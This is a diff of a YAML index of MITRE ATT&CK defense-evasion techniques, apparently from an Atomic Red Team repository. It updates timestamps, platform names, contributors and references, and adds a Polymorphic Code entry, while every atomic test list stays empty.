       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1562.003:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-03-30T21:01:47.940Z'
       name: 'Impair Defenses: Impair Command History Logging'
       description: "Adversaries may impair command history logging to hide commands
         they run on a compromised system. Various command interpreters keep track
@@ -8585,12 +8688,11 @@ defense-evasion:
         url: https://community.sophos.com/products/malware/b/blog/posts/powershell-command-history-forensics
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      spec_version: '2.1'
       identifier: T1562.003
     atomic_tests: []
   T1556.008:
     technique:
-      modified: '2023-10-31T14:00:00.188Z'
+      modified: '2023-05-04T18:02:51.318Z'
       name: Network Provider DLL
       description: "Adversaries may register malicious network provider dynamic link
         libraries (DLLs) to capture cleartext user credentials during the authentication
@@ -8665,45 +8767,10 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1497.002:
     technique:
-      x_mitre_platforms:
-      - Linux
-      - macOS
-      - Windows
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - Deloitte Threat Library Team
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--91541e7e-b969-40c6-bbd8-1b5352ec2938
-      type: attack-pattern
-      created: '2020-03-06T21:04:12.454Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1497.002
-        url: https://attack.mitre.org/techniques/T1497/002
-      - source_name: Deloitte Environment Awareness
-        url: https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc
-        description: Torello, A. & Guibernau, F. (n.d.). Environment Awareness. Retrieved
-          May 18, 2021.
-      - source_name: Sans Virtual Jan 2016
-        url: https://www.sans.org/reading-room/whitepapers/forensics/detecting-malware-sandbox-evasion-techniques-36667
-        description: Keragala, D. (2016, January 16). Detecting Malware and Sandbox
-          Evasion Techniques. Retrieved April 17, 2019.
-      - source_name: Unit 42 Sofacy Nov 2018
-        url: https://unit42.paloaltonetworks.com/unit42-sofacy-continues-global-attacks-wheels-new-cannon-trojan/
-        description: Falcone, R., Lee, B.. (2018, November 20). Sofacy Continues Global
-          Attacks and Wheels Out New ‘Cannon’ Trojan. Retrieved April 23, 2019.
-      - url: https://www.fireeye.com/blog/threat-research/2017/04/fin7-phishing-lnk.html
-        description: Carr, N., et al. (2017, April 24). FIN7 Evolution and the Phishing
-          LNK. Retrieved April 24, 2017.
-        source_name: FireEye FIN7 April 2017
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-09-12T15:50:18.050Z'
       name: User Activity Based Checks
       description: "Adversaries may employ various user activity checks to detect
         and avoid virtualization and analysis environments. This may include changing
@@ -8727,6 +8794,9 @@ defense-evasion:
         phase_name: defense-evasion
       - kill_chain_name: mitre-attack
         phase_name: discovery
+      x_mitre_contributors:
+      - Deloitte Threat Library Team
+      x_mitre_deprecated: false
       x_mitre_detection: 'User activity-based checks will likely occur in the first
         steps of an operation but may also occur throughout as an adversary learns
         the environment. Data and events should not be viewed in isolation, but as
@@ -8737,9 +8807,14 @@ defense-evasion:
         processes being spawned that gather a variety of system information or perform
         other forms of Discovery, especially in a short period of time, may aid in
         detection. '
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - Linux
+      - macOS
+      - Windows
       x_mitre_version: '1.1'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_data_sources:
       - 'Process: OS API Execution'
       - 'Process: Process Creation'
@@ -8749,8 +8824,35 @@ defense-evasion:
       - Static File Analysis
       - Signature-based detection
       - Host forensic analysis
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--91541e7e-b969-40c6-bbd8-1b5352ec2938
+      created: '2020-03-06T21:04:12.454Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1497/002
+        external_id: T1497.002
+      - source_name: FireEye FIN7 April 2017
+        description: Carr, N., et al. (2017, April 24). FIN7 Evolution and the Phishing
+          LNK. Retrieved April 24, 2017.
+        url: https://www.fireeye.com/blog/threat-research/2017/04/fin7-phishing-lnk.html
+      - source_name: Unit 42 Sofacy Nov 2018
+        description: Falcone, R., Lee, B.. (2018, November 20). Sofacy Continues Global
+          Attacks and Wheels Out New ‘Cannon’ Trojan. Retrieved April 23, 2019.
+        url: https://unit42.paloaltonetworks.com/unit42-sofacy-continues-global-attacks-wheels-new-cannon-trojan/
+      - source_name: Sans Virtual Jan 2016
+        description: Keragala, D. (2016, January 16). Detecting Malware and Sandbox
+          Evasion Techniques. Retrieved April 17, 2019.
+        url: https://www.sans.org/reading-room/whitepapers/forensics/detecting-malware-sandbox-evasion-techniques-36667
+      - source_name: Deloitte Environment Awareness
+        description: Torello, A. & Guibernau, F. (n.d.). Environment Awareness. Retrieved
+          September 13, 2024.
+        url: https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc/edit
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1134.004:
     technique:
@@ -8807,7 +8909,7 @@ defense-evasion:
         Adversaries may abuse these mechanisms to evade defenses, such as those blocking processes spawning directly from Office documents, and analysis targeting unusual/potentially malicious parent-child process relationships, such as spoofing the PPID of [PowerShell](https://attack.mitre.org/techniques/T1059/001)/[Rundll32](https://attack.mitre.org/techniques/T1218/011) to be <code>explorer.exe</code> rather than an Office document delivered as part of [Spearphishing Attachment](https://attack.mitre.org/techniques/T1566/001).(Citation: CounterCept PPID Spoofing Dec 2018) This spoofing could be executed via [Visual Basic](https://attack.mitre.org/techniques/T1059/005) within a malicious Office document or any code that can perform [Native API](https://attack.mitre.org/techniques/T1106).(Citation: CTD PPID Spoofing Macro Mar 2019)(Citation: CounterCept PPID Spoofing Dec 2018)
 
         Explicitly assigning the PPID may also enable elevated privileges given appropriate access rights to the parent process. For example, an adversary in a privileged user context (i.e. administrator) may spawn a new process and assign the parent as a process running as SYSTEM (such as <code>lsass.exe</code>), causing the new process to be elevated via the inherited access token.(Citation: XPNSec PPID Nov 2017)
-      modified: '2022-05-24T14:00:00.188Z'
+      modified: '2022-05-03T02:15:42.360Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: 'Access Token Manipulation: Parent PID Spoofing'
       x_mitre_detection: |-
@@ -8832,7 +8934,6 @@ defense-evasion:
       - Host Forensic Analysis
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1134.004
     atomic_tests: []
   T1055.014:
@@ -8903,7 +9004,7 @@ defense-evasion:
         resources, and possibly elevated privileges. Execution via VDSO hijacking
         may also evade detection from security products since the execution is masked
         under a legitimate process.  "
-      modified: '2022-11-08T14:00:00.188Z'
+      modified: '2022-07-07T17:09:09.048Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: VDSO Hijacking
       x_mitre_detection: "Monitor for malicious usage of system calls, such as ptrace
@@ -8930,11 +9031,10 @@ defense-evasion:
       - Application control
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1574.010:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-03-30T21:01:37.026Z'
       name: Services File Permissions Weakness
       description: |-
         Adversaries may execute their own malicious payloads by hijacking the binaries used by services. Adversaries may use flaws in the permissions of Windows services to replace the binary that is executed upon service start. These service processes may automatically execute specific binaries as part of their functionality or to perform other actions. If the permissions on the file system directory containing a target binary, or permissions on the binary itself are improperly set, then the target binary may be overwritten with another binary using user-level permissions and executed by the original process. If the original process and thread are running under a higher permissions level, then the replaced binary will also execute under higher-level permissions, which could include SYSTEM.
@@ -8988,7 +9088,6 @@ defense-evasion:
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
-      spec_version: '2.1'
     atomic_tests: []
   T1574.013:
     technique:
@@ -9024,7 +9123,7 @@ defense-evasion:
         url: https://docs.microsoft.com/en-us/windows/win32/api/winternl/nf-winternl-ntqueryinformationprocess
         description: Microsoft. (2021, November 23). NtQueryInformationProcess function
           (winternl.h). Retrieved February 4, 2022.
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-03-22T15:47:33.915Z'
       name: KernelCallbackTable
       description: |-
         Adversaries may abuse the <code>KernelCallbackTable</code> of a process to hijack its execution flow in order to run their own payloads.(Citation: Lazarus APT January 2022)(Citation: FinFisher exposed ) The <code>KernelCallbackTable</code> can be found in the Process Environment Block (PEB) and is initialized to an array of graphic functions available to a GUI process once <code>user32.dll</code> is loaded.(Citation: Windows Process Injection KernelCallbackTable)
@@ -9050,8 +9149,6 @@ defense-evasion:
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_data_sources:
       - 'Process: OS API Execution'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1542.004:
     technique:
@@ -9077,7 +9174,7 @@ defense-evasion:
         url: https://community.cisco.com/t5/security-blogs/attackers-continue-to-target-legacy-devices/ba-p/4169954
         description: Omar Santos. (2020, October 19). Attackers Continue to Target
           Legacy Devices. Retrieved October 20, 2020.
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-10-22T02:18:19.568Z'
       name: ROMMONkit
       description: |-
         Adversaries may abuse the ROM Monitor (ROMMON) by loading an unauthorized firmware with adversary code to provide persistent access and manipulate device behavior that is difficult to detect. (Citation: Cisco Synful Knock Evolution)(Citation: Cisco Blog Legacy Device Attacks)
@@ -9099,8 +9196,6 @@ defense-evasion:
       - 'Firmware: Firmware Modification'
       x_mitre_permissions_required:
       - Administrator
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1218.001:
     technique:
@@ -9166,12 +9261,11 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1218.001
     atomic_tests: []
   T1070.005:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-04-13T17:15:56.948Z'
       name: 'Indicator Removal on Host: Network Share Connection Removal'
       description: 'Adversaries may remove share connections that are no longer useful
         in order to clean up traces of their operation. Windows shared drive and [SMB/Windows
@@ -9226,7 +9320,6 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1070.005
     atomic_tests: []
   T1562.001:
@@ -9374,7 +9467,6 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1562.001
     atomic_tests: []
   T1601:
@@ -9401,7 +9493,7 @@ defense-evasion:
         url: https://tools.cisco.com/security/center/resources/integrity_assurance.html#13
         description: Cisco. (n.d.). Cisco IOS Software Integrity Assurance - Cisco
           IOS Run-Time Memory Integrity Verification. Retrieved October 19, 2020.
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-10-22T17:50:47.635Z'
       name: Modify System Image
       description: |-
         Adversaries may make changes to the operating system of embedded network devices to weaken defenses and provide new capabilities for themselves.  On such devices, the operating systems are typically monolithic and most of the device functionality and capabilities are contained within a single file.
@@ -9436,8 +9528,6 @@ defense-evasion:
       x_mitre_permissions_required:
       - Administrator
       x_mitre_is_subtechnique: false
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1574:
     technique:
@@ -9503,7 +9593,6 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1027.005:
     technique:
@@ -9529,7 +9618,7 @@ defense-evasion:
         Adversaries may remove indicators from tools if they believe their malicious tool was detected, quarantined, or otherwise curtailed. They can modify the tool by removing the indicator and using the updated version that is no longer detected by the target's defensive systems or subsequent targets that may use similar systems.
 
         A good example of this is when malware is detected with a file signature and quarantined by anti-virus software. An adversary who can determine that the malware was quarantined because of its file signature may modify the file to explicitly avoid that signature, and then re-use the malware.
-      modified: '2022-05-24T14:00:00.188Z'
+      modified: '2022-04-28T16:07:48.062Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: Indicator Removal from Tools
       x_mitre_detection: The first detection of a malicious tool may trigger an anti-virus
@@ -9554,11 +9643,10 @@ defense-evasion:
       - Signature-based detection
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1078:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-10-15T16:09:46.024Z'
       name: Valid Accounts
       description: |-
         Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access, network devices, and remote desktop.(Citation: volexity_0day_sophos_FW) Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.
@@ -9575,7 +9663,6 @@ defense-evasion:
         phase_name: privilege-escalation
       - kill_chain_name: mitre-attack
         phase_name: initial-access
-      x_mitre_attack_spec_version: 3.1.0
       x_mitre_contributors:
       - Syed Ummar Farooqh, McAfee
       - Prasad Somasamudram, McAfee
@@ -9585,7 +9672,7 @@ defense-evasion:
       - Netskope
       - Mark Wee
       - Praetorian
-      - Goldstein Menachem
+      - Menachem Goldstein
       x_mitre_deprecated: false
       x_mitre_detection: |-
         Configure robust, consistent account activity audit policies across the enterprise and with externally accessible services.(Citation: TechNet Audit Policy) Look for suspicious account behavior across systems that share accounts, either user, admin, or service accounts. Examples: one account logged into multiple systems simultaneously; multiple accounts logged into the same machine simultaneously; accounts logged in at odd times or outside of business hours. Activity may be from interactive login sessions or process ownership from accounts being used to execute binaries on a remote system as a particular account. Correlate other security systems with login information (e.g., a user has an active login session but has not entered the building or does not have VPN access).
@@ -9594,19 +9681,17 @@ defense-evasion:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: false
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
-      - Azure AD
-      - Office 365
       - SaaS
       - IaaS
       - Linux
       - macOS
-      - Google Workspace
       - Containers
       - Network
-      x_mitre_version: '2.6'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '2.7'
       x_mitre_data_sources:
       - 'Logon Session: Logon Session Creation'
       - 'User Account: User Account Authentication'
@@ -9654,11 +9739,12 @@ defense-evasion:
         url: https://technet.microsoft.com/en-us/library/dn487457.aspx
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      spec_version: '2.1'
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1055.012:
     technique:
-      modified: '2023-08-11T21:37:00.009Z'
+      modified: '2024-09-12T15:11:45.602Z'
       name: 'Process Injection: Process Hollowing'
       description: "Adversaries may inject malicious code into suspended and hollowed
         processes in order to evade process-based defenses. Process hollowing is a
@@ -9726,18 +9812,17 @@ defense-evasion:
           Retrieved December 7, 2017.'
         url: https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process
       - source_name: Leitch Hollowing
-        description: Leitch, J. (n.d.). Process Hollowing. Retrieved November 12,
-          2014.
-        url: http://www.autosectools.com/process-hollowing.pdf
+        description: Leitch, J. (n.d.). Process Hollowing. Retrieved September 12,
+          2024.
+        url: https://new.dc414.org/wp-content/uploads/2011/01/Process-Hollowing.pdf
       - source_name: Mandiant Endpoint Evading 2019
         description: 'Pena, E., Erikson, C. (2019, October 10). Staying Hidden on
           the Endpoint: Evading Detection with Shellcode. Retrieved November 29, 2021.'
         url: https://www.mandiant.com/resources/staying-hidden-on-the-endpoint-evading-detection-with-shellcode
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1055.012
     atomic_tests: []
   T1564.009:
@@ -9784,7 +9869,7 @@ defense-evasion:
         Adversaries may abuse resource forks to hide malicious code or executables to evade detection and bypass security applications. A resource fork provides applications a structured way to store resources such as thumbnail images, menu definitions, icons, dialog boxes, and code.(Citation: macOS Hierarchical File System Overview) Usage of a resource fork is identifiable when displaying a file’s extended attributes, using <code>ls -l@</code> or <code>xattr -l</code> commands. Resource forks have been deprecated and replaced with the application bundle structure. Non-localized resources are placed at the top level directory of an application bundle, while localized resources are placed in the <code>/Resources</code> folder.(Citation: Resource and Data Forks)(Citation: ELC Extended Attributes)
 
         Adversaries can use resource forks to hide malicious data that may otherwise be stored directly in files. Adversaries can execute content with an attached resource fork, at a specified offset, that is moved to an executable location then invoked. Resource fork content may also be obfuscated/encrypted until execution.(Citation: sentinellabs resource named fork 2020)(Citation: tau bundlore erika noerenberg 2020)
-      modified: '2022-05-24T14:00:00.188Z'
+      modified: '2022-05-05T05:10:23.890Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: Resource Forking
       x_mitre_detection: "Identify files with the <code>com.apple.ResourceFork</code>
@@ -9806,7 +9891,6 @@ defense-evasion:
       - Gatekeeper
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1027:
     technique:
@@ -9881,6 +9965,7 @@ defense-evasion:
       - 'Script: Script Execution'
       - 'File: File Creation'
       - 'Module: Module Load'
+      - 'Application Log: Application Log Content'
       - 'Command: Command Execution'
       - 'File: File Metadata'
       - 'Process: OS API Execution'
@@ -9940,12 +10025,11 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1027
     atomic_tests: []
   T1556.006:
     technique:
-      modified: '2024-04-16T00:20:21.488Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: Multi-Factor Authentication
       description: "Adversaries may disable or modify multi-factor authentication
         (MFA) mechanisms to enable persistent access to compromised accounts.\n\nOnce
@@ -9974,24 +10058,26 @@ defense-evasion:
         phase_name: defense-evasion
       - kill_chain_name: mitre-attack
         phase_name: persistence
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_contributors:
       - Liran Ravich, CardinalOps
       - Muhammad Moiz Arshad, @5T34L7H
+      - Arun Seelagan, CISA
       x_mitre_deprecated: false
       x_mitre_detection: ''
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
-      - Azure AD
-      - Office 365
       - SaaS
       - IaaS
-      - Google Workspace
       - Linux
       - macOS
-      x_mitre_version: '1.2'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.3'
       x_mitre_data_sources:
       - 'Logon Session: Logon Session Creation'
       - 'Application Log: Application Log Content'
@@ -10026,9 +10112,6 @@ defense-evasion:
         url: https://docs.microsoft.com/en-us/azure/active-directory/governance/conditional-access-exclusion
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.2.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1036.001:
     technique:
@@ -10051,7 +10134,7 @@ defense-evasion:
         url: https://threatexpress.com/blogs/2017/metatwin-borrowing-microsoft-metadata-and-digital-signatures-to-hide-binaries/
         description: Vest, J. (2017, October 9). Borrowing Microsoft MetaData and
           Signatures to Hide Binary Payloads. Retrieved September 10, 2019.
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-02-10T19:52:47.724Z'
       name: Invalid Code Signature
       description: |-
         Adversaries may attempt to mimic features of valid code signatures to increase the chance of deceiving a user, analyst, or tool. Code signing provides a level of authenticity on a binary from the developer and a guarantee that the binary has not been tampered with. Adversaries can copy the metadata and signature information from a signed program, then use it as a template for an unsigned program. Files with invalid code signatures will fail digital signature validation checks, but they may appear more legitimate to users and security tools may improperly handle these files.(Citation: Threatexpress MetaTwin 2017)
@@ -10069,8 +10152,6 @@ defense-evasion:
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_data_sources:
       - 'File: File Metadata'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1564.006:
     technique:
@@ -10109,7 +10190,7 @@ defense-evasion:
         description: Johann Rehberger. (2020, September 23). Beware of the Shadowbunny
           - Using virtual machines to persist and evade detections. Retrieved September
           22, 2021.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-10-14T22:21:59.708Z'
       name: Run Virtual Instance
       description: |-
         Adversaries may carry out malicious operations using a virtual instance to avoid detection. A wide variety of virtualization technologies exist that allow for the emulation of a computer or computing environment. By running malicious code inside of a virtual instance, adversaries can hide artifacts associated with their behavior from security tools that are unable to monitor activity inside the virtual instance. Additionally, depending on the virtual networking implementation (ex: bridged adapter), network traffic generated by the virtual instance can be difficult to trace back to the compromised host as the IP address and hostname might not match known values.(Citation: SingHealth Breach Jan 2019)
@@ -10152,10 +10233,78 @@ defense-evasion:
       - 'Command: Command Execution'
       x_mitre_permissions_required:
       - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1564.006
     atomic_tests: []
+  T1027.014:
+    technique:
+      modified: '2024-10-09T18:56:28.092Z'
+      name: Polymorphic Code
+      description: "Adversaries may utilize polymorphic code (also known as metamorphic
+        or mutating code) to evade detection. Polymorphic code is a type of software
+        capable of changing its runtime footprint during code execution.(Citation:
+        polymorphic-blackberry) With each execution of the software, the code is mutated
+        into a different version of itself that achieves the same purpose or objective
+        as the original. This functionality enables the malware to evade traditional
+        signature-based defenses, such as antivirus and antimalware tools.(Citation:
+        polymorphic-sentinelone) \nOther obfuscation techniques can be used in conjunction
+        with polymorphic code to accomplish the intended effects, including using
+        mutation engines to conduct actions such as [Software Packing](https://attack.mitre.org/techniques/T1027/002),
+        [Command Obfuscation](https://attack.mitre.org/techniques/T1027/010), or [Encrypted/Encoded
+        File](https://attack.mitre.org/techniques/T1027/013).(Citation: polymorphic-linkedin)(Citation:
+        polymorphic-medium)\n"
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: defense-evasion
+      x_mitre_contributors:
+      - Ye Yint Min Thu Htut, Active Defense Team, DBS Bank
+      - TruKno
+      x_mitre_deprecated: false
+      x_mitre_detection: ''
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - Windows
+      - macOS
+      - Linux
+      x_mitre_version: '1.0'
+      x_mitre_data_sources:
+      - 'Application Log: Application Log Content'
+      - 'File: File Creation'
+      - 'File: File Metadata'
+      x_mitre_defense_bypassed:
+      - Signature-based Detection
+      type: attack-pattern
+      id: attack-pattern--b577dfc1-0177-4522-8d5a-782127c8592b
+      created: '2024-09-27T12:28:03.938Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1027/014
+        external_id: T1027.014
+      - source_name: polymorphic-blackberry
+        description: Blackberry. (n.d.). What is Polymorphic Malware?. Retrieved September
+          27, 2024.
+        url: https://www.blackberry.com/us/en/solutions/endpoint-security/ransomware-protection/polymorphic-malware
+      - source_name: polymorphic-sentinelone
+        description: SentinelOne. (2023, March 18). What is Polymorphic Malware? Examples
+          and Challenges. Retrieved September 27, 2024.
+        url: https://www.sentinelone.com/cybersecurity-101/threat-intelligence/what-is-polymorphic-malware
+      - source_name: polymorphic-medium
+        description: 'Shellseekercyber. (2024, January 7). Explainer: Packed Malware.
+          Retrieved September 27, 2024.'
+        url: https://medium.com/@shellseekerscyber/explainer-packed-malware-16f09cc75035
+      - source_name: polymorphic-linkedin
+        description: 'Sherwin Akshay. (2024, May 28). Techniques for concealing malware
+          and hindering analysis: Packing up and unpacking stuff. Retrieved September
+          27, 2024.'
+        url: https://www.linkedin.com/pulse/techniques-concealing-malware-hindering-analysis-packing-akshay-unijc
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+    atomic_tests: []
   T1134.005:
     technique:
       x_mitre_platforms:
@@ -10199,7 +10348,7 @@ defense-evasion:
         description: Microsoft. (n.d.). Using DsAddSidHistory. Retrieved November
           30, 2017.
         source_name: Microsoft DsAddSidHistory
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-02-09T15:49:58.414Z'
       name: 'Access Token Manipulation: SID-History Injection'
       description: |-
         Adversaries may use SID-History Injection to escalate privileges and bypass access controls. The Windows security identifier (SID) is a unique value that identifies a user or group account. SIDs are used by Windows security in both security descriptors and access tokens. (Citation: Microsoft SID) An account can hold additional SIDs in the SID-History Active Directory attribute (Citation: Microsoft SID-History Attribute), allowing inter-operable account migration between domains (e.g., all values in SID-History are included in access tokens).
@@ -10224,8 +10373,6 @@ defense-evasion:
       x_mitre_permissions_required:
       - Administrator
       - SYSTEM
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1134.005
     atomic_tests: []
   T1599:
@@ -10256,7 +10403,7 @@ defense-evasion:
         Devices such as routers and firewalls can be used to create boundaries between trusted and untrusted networks.  They achieve this by restricting traffic types to enforce organizational policy in an attempt to reduce the risk inherent in such connections.  Restriction of traffic can be achieved by prohibiting IP addresses, layer 4 protocol ports, or through deep packet inspection to identify applications.  To participate with the rest of the network, these devices can be directly addressable or transparent, but their mode of operation has no bearing on how the adversary can bypass them when compromised.
 
         When an adversary takes control of such a boundary device, they can bypass its policy enforcement to pass normally prohibited traffic across the trust boundary between the two separated networks without hinderance.  By achieving sufficient rights on the device, an adversary can reconfigure the device to allow the traffic they want, allowing them to then further achieve goals such as command and control via [Multi-hop Proxy](https://attack.mitre.org/techniques/T1090/003) or exfiltration of data via [Traffic Duplication](https://attack.mitre.org/techniques/T1020/001). Adversaries may also target internal devices responsible for network segmentation and abuse these in conjunction with [Internal Proxy](https://attack.mitre.org/techniques/T1090/001) to achieve the same goals.(Citation: Kaspersky ThreatNeedle Feb 2021)  In the cases where a border device separates two separate organizations, the adversary can also facilitate lateral movement into new victim environments.
-      modified: '2022-05-24T14:00:00.188Z'
+      modified: '2022-05-05T05:05:44.200Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: Network Boundary Bridging
       x_mitre_detection: |-
@@ -10275,7 +10422,6 @@ defense-evasion:
       - System Access Controls
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1553:
     technique:
@@ -10370,11 +10516,10 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1548.004:
     technique:
